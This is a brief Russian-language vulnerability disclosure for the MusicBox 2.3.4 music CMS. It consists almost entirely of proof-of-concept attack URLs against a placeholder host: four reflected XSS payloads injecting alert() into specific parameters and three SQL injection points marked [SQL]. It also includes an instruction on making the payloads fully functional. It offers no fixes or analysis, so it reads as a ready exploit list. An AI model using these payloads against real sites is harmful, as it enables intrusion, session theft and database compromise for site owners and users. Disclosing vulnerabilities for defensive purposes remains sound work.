XSS и SQL-инъекции в MusicBox

Найденный в популярном музыкальном CMS — MusicBox 2.3.4 уязвимости состоят в следующем:
1. XSS:
http://www.target.xx/index.php?id=>alert(/EllipsisSecurityTest/)&page=0
http://www.target.xx/index.php?term=alert(/EllipsisSecurityTest/)&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=alert(/EllipsisSecurityTest/)
http://www.target.xx/index.php?action=top&show=alert(/EllipsisSecurityTest/)&type=Artists

(для полноценного использования убрать символ _ из кода!)
2. SQL-инъекции:
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]